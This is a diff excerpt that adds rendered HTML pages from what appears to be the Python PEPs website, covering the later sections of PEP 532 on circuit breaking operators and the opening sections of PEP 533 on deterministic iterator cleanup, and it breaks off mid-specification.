+assert (breaker else breaker) is foo
+assert (breaker if breaker else breaker) is foo
+
+
+

The factory functions in the operator module would then make it +straightforward to create circuit breakers that correspond to identity +checks using the is and is not operators:

+
def is_sentinel(value, sentinel):
+    """Returns a circuit breaker switching on 'value is sentinel'"""
+    return types.CircuitBreaker(value, value is sentinel)
+
+def is_not_sentinel(value, sentinel):
+    """Returns a circuit breaker switching on 'value is not sentinel'"""
+    return types.CircuitBreaker(value, value is not sentinel)
+
+
+
+
+

Truth checking comparisons

+

Due to their short-circuiting nature, the runtime logic underlying the and +and or operators has never previously been accessible through the +operator or types modules.

+

The introduction of circuit breaking operators and circuit breakers allows +that logic to be captured in the operator module as follows:

+
def true(value):
+    """Returns a circuit breaker switching on 'bool(value)'"""
+    return types.CircuitBreaker(value, bool(value))
+
+def false(value):
+    """Returns a circuit breaker switching on 'not bool(value)'"""
+    return types.CircuitBreaker(value, not bool(value))
+
+
+
    +
  • LHS or RHS would be effectively true(LHS) else RHS
  • +
  • LHS and RHS would be effectively false(LHS) else RHS
  • +
+

No actual change would take place in these operator definitions, the new +circuit breaking protocol and operators would just provide a way to make the +control flow logic programmable, rather than hardcoding the sense of the check +at development time.

+

Respecting the rules of boolean logic, these expressions could also be +expanded in their inverted form by using the right-associative circuit +breaking operator instead:

+
    +
  • LHS or RHS would be effectively RHS if false(LHS)
  • +
  • LHS and RHS would be effectively RHS if true(LHS)
  • +
+
+
+

None-aware operators

+

If both this PEP and PEP 505’s None-aware operators were accepted, then the +proposed is_sentinel and is_not_sentinel circuit breaker factories +would be used to encapsulate the notion of “None checking”: seeing if a value +is None and either falling back to an alternative value (an operation known +as “None-coalescing”) or passing it through as the result of the overall +expression (an operation known as “None-severing” or “None-propagating”).

+

Given these circuit breakers, LHS ?? RHS would be roughly equivalent to +both of the following:

+
    +
  • is_not_sentinel(LHS, None) else RHS
  • +
  • RHS if is_sentinel(LHS, None)
  • +
+

Due to the way they inject control flow into attribute lookup and subscripting +operations, None-aware attribute access and None-aware subscripting can’t be +expressed directly in terms of the circuit breaking operators, but they can +still be defined in terms of the underlying circuit breaking protocol.

+

In those terms, EXPR?.ATTR[KEY].SUBATTR() would be semantically +equivalent to:

+
_lookup_base = EXPR
+_circuit_breaker = is_not_sentinel(_lookup_base, None)
+_expr_result = _lookup_base.ATTR[KEY].SUBATTR() if _circuit_breaker
+
+
+

Similarly, EXPR?[KEY].ATTR.SUBATTR() would be semantically equivalent +to:

+
_lookup_base = EXPR
+_circuit_breaker = is_not_sentinel(_lookup_base, None)
+_expr_result = _lookup_base[KEY].ATTR.SUBATTR() if _circuit_breaker
+
+
+

The actual implementations of the None-aware operators would presumably be +optimised to skip actually creating the circuit breaker instance, but the +above expansions would still provide an accurate description of the observable +behaviour of the operators at runtime.

+
+
+

Rich chained comparisons

+

Refer to PEP 535 for a detailed discussion of this possible use case.

+
+
+

Other conditional constructs

+

No changes are proposed to if statements, while statements, comprehensions, +or generator expressions, as the boolean clauses they contain are used +entirely for control flow purposes and never return a result as such.

+

However, it’s worth noting that while such proposals are outside the scope of +this PEP, the circuit breaking protocol defined here would already be +sufficient to support constructs like:

+
def is_not_none(obj):
+    return is_sentinel(obj, None)
+
+while is_not_none(dynamic_query()) as result:
+    ... # Code using result
+
+
+

and:

+
if is_not_none(re.search(pattern, text)) as match:
+    ... # Code using match
+
+
+

This could be done by assigning the result of +operator.short_circuit(CONDITION) to the name given in the as clause, +rather than assigning CONDITION to the given name directly.

+
+
+

Style guide recommendations

+

The following additions to PEP 8 are proposed in relation to the new features +introduced by this PEP:

+
    +
  • Avoid combining conditional expressions (if-else) and the standalone +circuit breaking operators (if and else) in a single expression - +use one or the other depending on the situation, but not both.
  • +
  • Avoid using conditional expressions (if-else) and the standalone +circuit breaking operators (if and else) as part of if +conditions in if statements and the filter clauses of comprehensions +and generator expressions.
  • +
+
+
+
+

Rationale

+
+

Adding new operators

+

Similar to PEP 335, early drafts of this PEP focused on making the existing +and and or operators less rigid in their interpretation, rather than +proposing new operators. However, this proved to be problematic for a few key +reasons:

+
    +
  • the and and or operators have a long established and stable meaning, +so readers would inevitably be surprised if their meaning now became +dependent on the type of the left operand. Even new users would be confused +by this change due to 25+ years of teaching material that assumes the +current well-known semantics for these operators
  • +
  • Python interpreter implementations, including CPython, have taken advantage +of the existing semantics of and and or when defining runtime and +compile time optimisations, which would all need to be reviewed and +potentially discarded if the semantics of those operations changed
  • +
  • it isn’t clear what names would be appropriate for the new methods needed +to define the protocol
  • +
+

Proposing short-circuiting binary variants of the existing if-else ternary +operator instead resolves all of those issues:

+
    +
  • the runtime semantics of and and or remain entirely unchanged
  • +
  • while the semantics of the unary not operator do change, the invariant +required of __not__ implementations means that existing expression +optimisations in boolean contexts will remain valid.
  • +
  • __else__ is the short-circuiting outcome for if expressions due to +the absence of a trailing else clause
  • +
  • __then__ is the short-circuiting outcome for else expressions due to +the absence of a leading if clause (this connection would be even clearer +if the method name was __if__, but that would be ambiguous given the +other uses of the if keyword that won’t invoke the circuit breaking +protocol)
  • +
+
+
+

Naming the operator and protocol

+

The names “circuit breaking operator”, “circuit breaking protocol” and +“circuit breaker” are all inspired by the phrase “short circuiting operator”: +the general language design term for operators that only conditionally +evaluate their right operand.

+

The electrical analogy is that circuit breakers in Python detect and handle +short circuits in expressions before they trigger any exceptions similar to the +way that circuit breakers detect and handle short circuits in electrical +systems before they damage any equipment or harm any humans.

+

The Python level analogy is that just as a break statement lets you +terminate a loop before it reaches its natural conclusion, a circuit breaking +expression lets you terminate evaluation of the expression and produce a result +immediately.

+
+
+

Using existing keywords

+

Using existing keywords has the benefit of allowing the new operators to +be introduced without a __future__ statement.

+

if and else are semantically appropriate for the proposed new protocol, +and the only additional syntactic ambiguity introduced arises when the new +operators are combined with the explicit if-else conditional expression +syntax.

+

The PEP handles that ambiguity by explicitly specifying how it should be +handled by interpreter implementers, but proposing to point out in PEP 8 +that even though interpreters will understand it, human readers probably +won’t, and hence it won’t be a good idea to use both conditional expressions +and the circuit breaking operators in a single expression.

+
+
+

Naming the protocol methods

+

Naming the __else__ method was straightforward, as reusing the operator +keyword name results in a special method name that is both obvious and +unambiguous.

+

Naming the __then__ method was less straightforward, as there was another +possible option in using the keyword-based name __if__.

+

The problem with __if__ is that there would continue to be many cases +where the if keyword appeared, with an expression to its immediate right, +but the __if__ special method would not be invoked. Instead, the +bool() builtin and its underlying special methods (__bool__, +__len__) would be invoked, while __if__ had no effect.

+

With the boolean protocol already playing a part in conditional expressions and +the new circuit breaking protocol, the less ambiguous name __then__ was +chosen based on the terminology commonly used in computer science and +programming language design to describe the first clause of an if +statement.

+
+
+

Making binary if right-associative

+

The precedent set by conditional expressions means that a binary +short-circuiting if expression must necessarily have the condition on the +right as a matter of consistency.

+

With the right operand always being evaluated first, and the left operand not +being evaluated at all if the right operand is true in a boolean context, +the natural outcome is a right-associative operator.

+
+
+

Naming the standard circuit breakers

+

When used solely with the left-associative circuit breaking operator, +explicit circuit breaker names for unary checks read well if they start with +the preposition if_:

+
operator.if_true(LHS) else RHS
+operator.if_false(LHS) else RHS
+
+
+

However, incorporating the if_ doesn’t read as well when performing +logical inversion:

+
not operator.if_true(LHS) else RHS
+not operator.if_false(LHS) else RHS
+
+
+

Or when using the right-associative circuit breaking operator:

+
LHS if operator.if_true(RHS)
+LHS if operator.if_false(RHS)
+
+
+

Or when naming a binary comparison operation:

+
operator.if_is_sentinel(VALUE, SENTINEL) else EXPR
+operator.if_is_not_sentinel(VALUE, SENTINEL) else EXPR
+
+
+

By contrast, omitting the preposition from the circuit breaker name gives a +result that reads reasonably well in all forms for unary checks:

+
operator.true(LHS) else RHS       # Preceding "LHS if " implied
+operator.false(LHS) else RHS      # Preceding "LHS if " implied
+not operator.true(LHS) else RHS   # Preceding "LHS if " implied
+not operator.false(LHS) else RHS  # Preceding "LHS if " implied
+LHS if operator.true(RHS)         # Trailing " else RHS" implied
+LHS if operator.false(RHS)        # Trailing " else RHS" implied
+LHS if not operator.true(RHS)     # Trailing " else RHS" implied
+LHS if not operator.false(RHS)    # Trailing " else RHS" implied
+
+
+

And also reads well for binary checks:

+
operator.is_sentinel(VALUE, SENTINEL) else EXPR
+operator.is_not_sentinel(VALUE, SENTINEL) else EXPR
+EXPR if operator.is_sentinel(VALUE, SENTINEL)
+EXPR if operator.is_not_sentinel(VALUE, SENTINEL)
+
+
+
+
+
+

Risks and concerns

+

This PEP has been designed specifically to address the risks and concerns +raised when discussing PEPs 335, 505 and 531.

+
    +
  • it defines new operators and adjusts the definition of chained comparison +(in a separate PEP) rather than impacting the existing and and or +operators
  • +
  • the proposed new operators are general purpose short-circuiting binary +operators that can even be used to express the existing semantics of and +and or rather than focusing solely and inflexibly on identity checking +against None
  • +
  • the changes to the not unary operator and the is and is not +binary comparison operators are defined in such a way that control flow +optimisations based on the existing semantics remain valid
  • +
+

One consequence of this approach is that this PEP on its own doesn’t produce +much in the way of direct benefits to end users aside from making it possible +to omit some common None if prefixes and else None suffixes from +particular forms of conditional expression.

+

Instead, what it mainly provides is a common foundation that would allow the +None-aware operator proposals in PEP 505 and the rich comparison chaining +proposal in PEP 535 to be pursued atop a common underlying semantic framework +that would also be shared with conditional expressions and the existing and +and or operators.

+
+
+

Design Discussion

+
+

Protocol walk-through

+

The following diagram illustrates the core concepts behind the circuit +breaking protocol (although it glosses over the technical detail of looking +up the special methods via the type rather than the instance):

+diagram of circuit breaking protocol applied to ternary expression +

We will work through the following expression:

+
>>> def is_not_none(obj):
+...     return operator.is_not_sentinel(obj, None)
+>>> x if is_not_none(data.get("key")) else y
+
+
+

is_not_none is a helper function that invokes the proposed +operator.is_not_sentinel types.CircuitBreaker factory with None as +the sentinel value. data is a container (such as a builtin dict +instance) that returns None when the get() method is called with an +unknown key.

+

We can rewrite the example to give a name to the circuit breaker instance:

+
>>> maybe_value = is_not_none(data.get("key"))
+>>> x if maybe_value else y
+
+
+

Here the maybe_value circuit breaker instance corresponds to breaker +in the diagram.

+

The ternary condition is evaluated by calling bool(maybe_value), which is +the same as Python’s existing behavior. The change in behavior is that instead +of directly returning one of the operands x or y, the circuit breaking +protocol passes the relevant operand to the circuit breaker used in the +condition.

+

If bool(maybe_value) evaluates to True (i.e. the requested +key exists and its value is not None) then the interpreter calls +type(maybe_value).__then__(maybe_value, x). Otherwise, it calls +type(maybe_value).__else__(maybe_value, y).

+

The protocol also applies to the new if and else binary operators, +but in these cases, the interpreter needs a way to indicate the missing third +operand. It does this by re-using the circuit breaker itself in that role.

+

Consider these two expressions:

+
>>> x if data.get("key") is None
+>>> x if operator.is_sentinel(data.get("key"), None)
+
+
+

The first form of this expression returns x if data.get("key") is None, +but otherwise returns False, which almost certainly isn’t what we want.

+

By contrast, the second form of this expression still returns x if +data.get("key") is None, but otherwise returns data.get("key"), which +is significantly more useful behaviour.

+

We can understand this behavior by rewriting it as a ternary expression with +an explicitly named circuit breaker instance:

+
>>> maybe_value = operator.is_sentinel(data.get("key"), None)
+>>> x if maybe_value else maybe_value
+
+
+

If bool(maybe_value) is True (i.e. data.get("key") is None), +then the interpreter calls type(maybe_value).__then__(maybe_value, x). The +implementation of types.CircuitBreaker.__then__ doesn’t see anything that +indicates short-circuiting has taken place, and hence returns x.

+

By contrast, if bool(maybe_value) is False (i.e. data.get("key") +is not None), the interpreter calls +type(maybe_value).__else__(maybe_value, maybe_value). The implementation of +types.CircuitBreaker.__else__ detects that the instance method has received +itself as its argument and returns the wrapped value (i.e. data.get("key")) +rather than the circuit breaker.

+

The same logic applies to else, only reversed:

+
>>> is_not_none(data.get("key")) else y
+
+
+

This expression returns data.get("key") if it is not None, otherwise it +evaluates and returns y. To understand the mechanics, we rewrite the +expression as follows:

+
>>> maybe_value = is_not_none(data.get("key"))
+>>> maybe_value if maybe_value else y
+
+
+

If bool(maybe_value) is True, then the expression short-circuits and +the interpreter calls type(maybe_value).__else__(maybe_value, maybe_value). +The implementation of types.CircuitBreaker.__then__ detects that the +instance method has received itself as its argument and returns the wrapped +value (i.e. data.get("key")) rather than the circuit breaker.

+

If bool(maybe_value) is True, the interpreter calls +type(maybe_value).__else__(maybe_value, y). The implementation of +types.CircuitBreaker.__else__ doesn’t see anything that indicates +short-circuiting has taken place, and hence returns y.

+
+
+

Respecting De Morgan’s Laws

+

Similar to and and or, the binary short-circuiting operators will +permit multiple ways of writing essentially the same expression. This +seeming redundancy is unfortunately an implied consequence of defining the +protocol as a full boolean algebra, as boolean algebras respect a pair of +properties known as “De Morgan’s Laws”: the ability to express the results +of and and or operations in terms of each other and a suitable +combination of not operations.

+

For and and or in Python, these invariants can be described as follows:

+
assert bool(A and B) == bool(not (not A or not B))
+assert bool(A or B) == bool(not (not A and not B))
+
+
+

That is, if you take one of the operators, invert both operands, switch to the +other operator, and then invert the overall result, you’ll get the same +answer (in a boolean sense) as you did from the original operator. (This may +seem redundant, but in many situations it actually lets you eliminate double +negatives and find tautologically true or false subexpressions, thus reducing +the overall expression size).

+

For circuit breakers, defining a suitable invariant is complicated by the +fact that they’re often going to be designed to eliminate themselves from the +expression result when they’re short-circuited, which is an inherently +asymmetric behaviour. Accordingly, that inherent asymmetry needs to be +accounted for when mapping De Morgan’s Laws to the expected behaviour of +symmetric circuit breakers.

+

One way this complication can be addressed is to wrap the operand that would +otherwise short-circuit in operator.true, ensuring that when bool is +applied to the overall result, it uses the same definition of truth that was +used to decide which branch to evaluate, rather than applying bool directly +to the circuit breaker’s input value.

+

Specifically, for the new short-circuiting operators, the following properties +would be reasonably expected to hold for any well-behaved symmetric circuit +breaker that implements both __bool__ and __not__:

+
assert bool(B if true(A)) == bool(not (true(not A) else not B))
+assert bool(true(A) else B) == bool(not (not B if true(not A)))
+
+
+

Note the order of operations on the right hand side (applying true +after inverting the input circuit breaker) - this ensures that an +assertion is actually being made about type(A).__not__, rather than +merely being about the behaviour of type(true(A)).__not__.

+

At the very least, types.CircuitBreaker instances would respect this +logic, allowing existing boolean expression optimisations (like double +negative elimination) to continue to be applied.

+
+
+

Arbitrary sentinel objects

+

Unlike PEPs 505 and 531, the proposal in this PEP readily handles custom +sentinel objects:

+
_MISSING = object()
+
+# Using the sentinel to check whether or not an argument was supplied
+def my_func(arg=_MISSING):
+    arg = make_default() if is_sentinel(arg, _MISSING) # "else arg" implied
+
+
+
+
+

Implicitly defined circuit breakers in circuit breaking expressions

+

A never-posted draft of this PEP explored the idea of special casing the +is and is not binary operators such that they were automatically +treated as circuit breakers when used in the context of a circuit breaking +expression. Unfortunately, it turned out that this approach necessarily +resulted in one of two highly undesirable outcomes:

+
    +
  1. the return type of these expressions changed universally from bool to +types.CircuitBreaker, potentially creating a backwards compatibility +problem (especially when working with extension module APIs that +specifically look for a builtin boolean value with PyBool_Check rather +than passing the supplied value through PyObject_IsTrue or using +the p (predicate) format in one of the argument parsing functions)
  2. +
  3. the return type of these expressions became context dependent, meaning +that other routine refactorings (like pulling a comparison operation out +into a local variable) could have a significant impact on the runtime +semantics of a piece of code
  4. +
+

Neither of those possible outcomes seems warranted by the proposal in this PEP, +so it reverted to the current design where circuit breaker instances must be +created explicitly via API calls, and are never produced implicitly.

+
+
+
+

Implementation

+

As with PEP 505, actual implementation has been deferred pending in-principle +interest in the idea of making these changes.

+

…TBD…

+
+
+

Acknowledgements

+

Thanks go to Steven D’Aprano for his detailed critique [2] of the initial +draft of this PEP that inspired many of the changes in the second draft, as +well as to all of the other participants in that discussion thread [3].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0532.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0533/index.html b/pep-0533/index.html new file mode 100644 index 00000000000..f28fdd6b184 --- /dev/null +++ b/pep-0533/index.html @@ -0,0 +1,882 @@ + + + + + + + + PEP 533 – Deterministic cleanup for iterators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 533 – Deterministic cleanup for iterators

+
+
Author:
+
Nathaniel J. Smith
+
BDFL-Delegate:
+
Yury Selivanov <yury at edgedb.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
18-Oct-2016
+
Post-History:
+
18-Oct-2016
+
+
+
+
Table of Contents +
+
+

Abstract

+

We propose to extend the iterator protocol with a new +__(a)iterclose__ slot, which is called automatically on exit from +(async) for loops, regardless of how they exit. This allows for +convenient, deterministic cleanup of resources held by iterators +without reliance on the garbage collector. This is especially valuable +for asynchronous generators.

+
+
+

Note on timing

+

In practical terms, the proposal here is divided into two separate +parts: the handling of async iterators, which should ideally be +implemented ASAP, and the handling of regular iterators, which is a +larger but more relaxed project that can’t start until 3.7 at the +earliest. But since the changes are closely related, and we probably +don’t want to end up with async iterators and regular iterators +diverging in the long run, it seems useful to look at them together.

+
+
+

Background and motivation

+

Python iterables often hold resources which require cleanup. For +example: file objects need to be closed; the WSGI spec adds a close method +on top of the regular iterator protocol and demands that consumers +call it at the appropriate time (though forgetting to do so is a +frequent source of bugs); +and PEP 342 (based on PEP 325) extended generator objects to add a +close method to allow generators to clean up after themselves.

+

Generally, objects that need to clean up after themselves also define +a __del__ method to ensure that this cleanup will happen +eventually, when the object is garbage collected. However, relying on +the garbage collector for cleanup like this causes serious problems in +several cases:

+
    +
  • In Python implementations that do not use reference counting +(e.g. PyPy, Jython), calls to __del__ may be arbitrarily delayed +– yet many situations require prompt cleanup of +resources. Delayed cleanup produces problems like crashes due to +file descriptor exhaustion, or WSGI timing middleware that collects +bogus times.
  • +
  • Async generators (PEP 525) can only perform cleanup under the +supervision of the appropriate coroutine runner. __del__ doesn’t +have access to the coroutine runner; indeed, the coroutine runner +might be garbage collected before the generator object. So relying +on the garbage collector is effectively impossible without some kind +of language extension. (PEP 525 does provide such an extension, but +it has a number of limitations that this proposal fixes; see the +“alternatives” section below for discussion.)
  • +
+

Fortunately, Python provides a standard tool for doing resource +cleanup in a more structured way: with blocks. For example, this +code opens a file but relies on the garbage collector to close it:

+
def read_newline_separated_json(path):
+    for line in open(path):
+        yield json.loads(line)
+
+for document in read_newline_separated_json(path):
+    ...
+
+
+

and recent versions of CPython will point this out by issuing a +ResourceWarning, nudging us to fix it by adding a with block:

+
def read_newline_separated_json(path):
+    with open(path) as file_handle:      # <-- with block
+        for line in file_handle:
+            yield json.loads(line)
+
+for document in read_newline_separated_json(path):  # <-- outer for loop
+    ...
+
+
+

But there’s a subtlety here, caused by the interaction of with +blocks and generators. with blocks are Python’s main tool for +managing cleanup, and they’re a powerful one, because they pin the +lifetime of a resource to the lifetime of a stack frame. But this +assumes that someone will take care of cleaning up the stack +frame… and for generators, this requires that someone close +them.

+

In this case, adding the with block is enough to shut up the +ResourceWarning, but this is misleading – the file object cleanup +here is still dependent on the garbage collector. The with block +will only be unwound when the read_newline_separated_json +generator is closed. If the outer for loop runs to completion then +the cleanup will happen immediately; but if this loop is terminated +early by a break or an exception, then the with block won’t +fire until the generator object is garbage collected.

+

The correct solution requires that all users of this API wrap every +for loop in its own with block:

+
with closing(read_newline_separated_json(path)) as genobj:
+    for document in genobj:
+        ...
+
+
+

This gets even worse if we consider the idiom of decomposing a complex +pipeline into multiple nested generators:

+
def read_users(path):
+    with closing(read_newline_separated_json(path)) as gen:
+        for document in gen:
+            yield User.from_json(document)
+
+def users_in_group(path, group):
+    with closing(read_users(path)) as gen:
+        for user in gen:
+            if user.group == group:
+                yield user
+
+
+

In general if you have N nested generators then you need N+1 with +blocks to clean up 1 file. And good defensive programming would +suggest that any time we use a generator, we should assume the +possibility that there could be at least one with block somewhere +in its (potentially transitive) call stack, either now or in the +future, and thus always wrap it in a with. But in practice, +basically nobody does this, because programmers would rather write +buggy code than tiresome repetitive code. In simple cases like this +there are some workarounds that good Python developers know (e.g. in +this simple case it would be idiomatic to pass in a file handle +instead of a path and move the resource management to the top level), +but in general we cannot avoid the use of with/finally inside +of generators, and thus dealing with this problem one way or +another. When beauty and correctness fight then beauty tends to win, +so it’s important to make correct code beautiful.

+

Still, is this worth fixing? Until async generators came along I would +have argued yes, but that it was a low priority, since everyone seems +to be muddling along okay – but async generators make it much more +urgent. Async generators cannot do cleanup at all without some +mechanism for deterministic cleanup that people will actually use, and +async generators are particularly likely to hold resources like file +descriptors. (After all, if they weren’t doing I/O, they’d be +generators, not async generators.) So we have to do something, and it +might as well be a comprehensive fix to the underlying problem. And +it’s much easier to fix this now when async generators are first +rolling out, than it will be to fix it later.

+

The proposal itself is simple in concept: add a __(a)iterclose__ +method to the iterator protocol, and have (async) for loops call +it when the loop is exited, even if this occurs via break or +exception unwinding. Effectively, we’re taking the current cumbersome +idiom (with block + for loop) and merging them together into a +fancier for. This may seem non-orthogonal, but makes sense when +you consider that the existence of generators means that with +blocks actually depend on iterator cleanup to work reliably, plus +experience showing that iterator cleanup is often a desirable feature +in its own right.

+
+
+

Alternatives

+
+

PEP 525 asyncgen hooks

+

PEP 525 proposes a set of global thread-local hooks +managed by new sys.{get/set}_asyncgen_hooks() functions, which +allow event loops to integrate with the garbage collector to run +cleanup for async generators. In principle, this proposal and PEP 525 +are complementary, in the same way that with blocks and +__del__ are complementary: this proposal takes care of ensuring +deterministic cleanup in most cases, while PEP 525’s GC hooks clean up +anything that gets missed. But __aiterclose__ provides a number of +advantages over GC hooks alone:

+
    +
  • The GC hook semantics aren’t part of the abstract async iterator +protocol, but are instead restricted specifically to the async +generator concrete type. If +you have an async iterator implemented using a class, like:
    class MyAsyncIterator:
    +    async def __anext__():
    +        ...
    +
    +
    +

    then you can’t refactor this into an async generator without +changing its semantics, and vice-versa. This seems very +unpythonic. (It also leaves open the question of what exactly +class-based async iterators are supposed to do, given that they face +exactly the same cleanup problems as async generators.) +__aiterclose__, on the other hand, is defined at the protocol +level, so it’s duck-type friendly and works for all iterators, not +just generators.

    +
  • +
  • Code that wants to work on non-CPython implementations like PyPy +cannot in general rely on GC for cleanup. Without +__aiterclose__, it’s more or less guaranteed that developers who +develop and test on CPython will produce libraries that leak +resources when used on PyPy. Developers who do want to target +alternative implementations will either have to take the defensive +approach of wrapping every for loop in a with block, or else +carefully audit their code to figure out which generators might +possibly contain cleanup code and add with blocks around those +only. With __aiterclose__, writing portable code becomes easy +and natural.
  • +
  • An important part of building robust software is making sure that +exceptions always propagate correctly without being lost. One of the +most exciting things about async/await compared to traditional +callback-based systems is that instead of requiring manual chaining, +the runtime can now do the heavy lifting of propagating errors, +making it much easier to write robust code. But, this beautiful +new picture has one major gap: if we rely on the GC for generator +cleanup, then exceptions raised during cleanup are lost. So, again, +with __aiterclose__, developers who care about this kind of +robustness will either have to take the defensive approach of +wrapping every for loop in a with block, or else carefully +audit their code to figure out which generators might possibly +contain cleanup code. __aiterclose__ plugs this hole by +performing cleanup in the caller’s context, so writing more robust +code becomes the path of least resistance.
  • +
  • The WSGI experience suggests that there exist important +iterator-based APIs that need prompt cleanup and cannot rely on the +GC, even in CPython. For example, consider a hypothetical WSGI-like +API based around async/await and async iterators, where a response +handler is an async generator that takes request headers + an async +iterator over the request body, and yields response headers + the +response body. (This is actually the use case that got me interested +in async generators in the first place, i.e. this isn’t +hypothetical.) If we follow WSGI in requiring that child iterators +must be closed properly, then without __aiterclose__ the +absolute most minimalistic middleware in our system looks something +like:
    async def noop_middleware(handler, request_header, request_body):
    +    async with aclosing(handler(request_body, request_body)) as aiter:
    +        async for response_item in aiter:
    +            yield response_item
    +
    +
    +

    Arguably in regular code one can get away with skipping the with +block around for loops, depending on how confident one is that +one understands the internal implementation of the generator. But +here we have to cope with arbitrary response handlers, so without +__aiterclose__, this with construction is a mandatory part +of every middleware.

    +

    __aiterclose__ allows us to eliminate the mandatory boilerplate +and an extra level of indentation from every middleware:

    +
    async def noop_middleware(handler, request_header, request_body):
    +    async for response_item in handler(request_header, request_body):
    +        yield response_item
    +
    +
    +
  • +
+

So the __aiterclose__ approach provides substantial advantages +over GC hooks.

+

This leaves open the question of whether we want a combination of GC +hooks + __aiterclose__, or just __aiterclose__ alone. Since +the vast majority of generators are iterated over using a for loop +or equivalent, __aiterclose__ handles most situations before the +GC has a chance to get involved. The case where GC hooks provide +additional value is in code that does manual iteration, e.g.:

+
agen = fetch_newline_separated_json_from_url(...)
+while True:
+    document = await type(agen).__anext__(agen)
+    if document["id"] == needle:
+        break
+# doesn't do 'await agen.aclose()'
+
+
+

If we go with the GC-hooks + __aiterclose__ approach, this +generator will eventually be cleaned up by GC calling the generator +__del__ method, which then will use the hooks to call back into +the event loop to run the cleanup code.

+

If we go with the no-GC-hooks approach, this generator will eventually +be garbage collected, with the following effects:

+
    +
  • its __del__ method will issue a warning that the generator was +not closed (similar to the existing “coroutine never awaited” +warning).
  • +
  • The underlying resources involved will still be cleaned up, because +the generator frame will still be garbage collected, causing it to +drop references to any file handles or sockets it holds, and then +those objects’s __del__ methods will release the actual +operating system resources.
  • +
  • But, any cleanup code inside the generator itself (e.g. logging, +buffer flushing) will not get a chance to run.
  • +
+

The solution here – as the warning would indicate – is to fix the +code so that it calls __aiterclose__, e.g. by using a with +block:

+
async with aclosing(fetch_newline_separated_json_from_url(...)) as agen:
+    while True:
+        document = await type(agen).__anext__(agen)
+        if document["id"] == needle:
+            break
+
+
+

Basically in this approach, the rule would be that if you want to +manually implement the iterator protocol, then it’s your +responsibility to implement all of it, and that now includes +__(a)iterclose__.

+

GC hooks add non-trivial complexity in the form of (a) new global +interpreter state, (b) a somewhat complicated control flow (e.g., +async generator GC always involves resurrection, so the details of PEP +442 are important), and (c) a new public API in asyncio (await +loop.shutdown_asyncgens()) that users have to remember to call at +the appropriate time. (This last point in particular somewhat +undermines the argument that GC hooks provide a safe backup to +guarantee cleanup, since if shutdown_asyncgens() isn’t called +correctly then I think it’s possible for generators to be silently +discarded without their cleanup code being called; compare this to the +__aiterclose__-only approach where in the worst case we still at +least get a warning printed. This might be fixable.) All this +considered, GC hooks arguably aren’t worth it, given that the only +people they help are those who want to manually call __anext__ yet +don’t want to manually call __aiterclose__. But Yury disagrees +with me on this :-). And both options are viable.

+
+
+

Always inject resources, and do all cleanup at the top level

+

Several commentators on python-dev and python-ideas have suggested +that a pattern to avoid these problems is to always pass resources in +from above, e.g. read_newline_separated_json should take a file +object rather than a path, with cleanup handled at the top level:

+
def read_newline_separated_json(file_handle):
+    for line in file_handle:
+        yield json.loads(line)
+
+def read_users(file_handle):
+    for document in read_newline_separated_json(file_handle):
+        yield User.from_json(document)
+
+with open(path) as file_handle:
+    for user in read_users(file_handle):
+        ...
+
+
+

This works well in simple cases; here it lets us avoid the “N+1 +with blocks problem”. But unfortunately, it breaks down quickly +when things get more complex. Consider if instead of reading from a +file, our generator was reading from a streaming HTTP GET request – +while handling redirects and authentication via OAUTH. Then we’d +really want the sockets to be managed down inside our HTTP client +library, not at the top level. Plus there are other cases where +finally blocks embedded inside generators are important in their +own right: db transaction management, emitting logging information +during cleanup (one of the major motivating use cases for WSGI +close), and so forth. So this is really a workaround for simple +cases, not a general solution.

+
+
+

More complex variants of __(a)iterclose__

+

The semantics of __(a)iterclose__ are somewhat inspired by +with blocks, but context managers are more powerful: +__(a)exit__ can distinguish between a normal exit versus exception +unwinding, and in the case of an exception it can examine the +exception details and optionally suppress +propagation. __(a)iterclose__ as proposed here does not have these +powers, but one can imagine an alternative design where it did.

+

However, this seems like unwarranted complexity: experience suggests +that it’s common for iterables to have close methods, and even to +have __exit__ methods that call self.close(), but I’m not +aware of any common cases that make use of __exit__’s full +power. I also can’t think of any examples where this would be +useful. And it seems unnecessarily confusing to allow iterators to +affect flow control by swallowing exceptions – if you’re in a +situation where you really want that, then you should probably use a +real with block anyway.

+
+
+
+

Specification

+

This section describes where we want to eventually end up, though +there are some backwards compatibility issues that mean we can’t jump +directly here. A later section describes the transition plan.

+
+

Guiding principles

+

Generally, __(a)iterclose__ implementations should:

+
    +
  • be idempotent,
  • +
  • perform any cleanup that is appropriate on the assumption that the +iterator will not be used again after __(a)iterclose__ is +called. In particular, once __(a)iterclose__ has been called +then calling __(a)next__ produces undefined behavior.
  • +
+

And generally, any code which starts iterating through an iterable +with the intention of exhausting it, should arrange to make sure that +__(a)iterclose__ is eventually called, whether or not the iterator +is actually exhausted.

+
+
+

Changes to iteration

+

The core proposal is the change in behavior of for loops. Given +this Python code:

+
for VAR in ITERABLE:
+    LOOP-BODY
+else:
+    ELSE-BODY
+
+
+

we desugar to the equivalent of:

+
_iter = iter(ITERABLE)
+_iterclose = getattr(type(_iter), "__iterclose__", lambda: None)
+try:
+    traditional-for VAR in _iter:
+        LOOP-BODY
+    else:
+        ELSE-BODY
+finally:
+    _iterclose(_iter)
+
+
+

where the “traditional-for statement” here is meant as a shorthand for +the classic 3.5-and-earlier for loop semantics.

+

Besides the top-level for statement, Python also contains several +other places where iterators are consumed. For consistency, these +should call __iterclose__ as well using semantics equivalent to +the above. This includes:

+
    +
  • for loops inside comprehensions
  • +
  • * unpacking
  • +
  • functions which accept and fully consume iterables, like +list(it), tuple(it), itertools.product(it1, it2, ...), +and others.
  • +
+

In addition, a yield from that successfully exhausts the called +generator should as a last step call its __iterclose__ +method. (Rationale: yield from already links the lifetime of the +calling generator to the called generator; if the calling generator is +closed when half-way through a yield from, then this will already +automatically close the called generator.)

+
+
+

Changes to async iteration

+

We also make the analogous changes to async iteration constructs, +except that the new slot is called __aiterclose__, and it’s an +async method that gets awaited.

+
+
+

Modifications to basic iterator types

+

Generator objects (including those created by generator +comprehensions):

+
    +
  • __iterclose__ calls self.close()
  • +
